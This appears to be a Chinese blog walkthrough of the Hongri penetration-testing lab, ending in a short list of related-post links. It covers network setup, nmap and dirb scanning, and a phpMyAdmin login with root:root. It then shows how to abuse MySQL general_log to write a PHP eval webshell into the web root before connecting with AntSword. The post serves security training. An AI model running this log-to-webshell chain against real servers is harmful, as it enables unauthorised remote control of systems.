【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn 192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口-> 开放 http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

相关推荐
是垚不是土3 分钟前
PostgreSQL 运维工程师 “一本通“ :安装、配置、备份与监控
linux·运维·数据库·postgresql·运维开发
IT大白鼠6 分钟前
Linux账号和权限管理
linux·运维·服务器
zzzyyy5389 分钟前
Linux 下 从 ELF 可执行文件 到 进程虚拟地址空间的加载、映射与运行底层原理
linux·运维
MXsoft61817 分钟前
**多协议接入****≠****全栈覆盖:设备监控盲区的真相与破解之道**
运维
tiandyoin19 分钟前
IPCONFIG重置网络
网络·ip·dfs·dns·vpn·cmd
厚皮龙21 分钟前
使用 SSH 密钥上传 GitHub 仓库流程
运维·ssh·github
tingting011941 分钟前
敏感目录扫描及响应码
安全
lifewange1 小时前
Nginx + Kafka 可编程精细控制 完整版(可直接落地运行)
运维·nginx·kafka
Ether IC Verifier1 小时前
CPU/GPU/NPU/DPU功能详解与AI应用分析
网络·人工智能·网络协议·tcp/ip·计算机网络·dpu
TheRouter1 小时前
把 ClaudeCode 换成DeepSeek V4:两行配置,成本立省80%(含 Anthropic 兼容接口)
网络·架构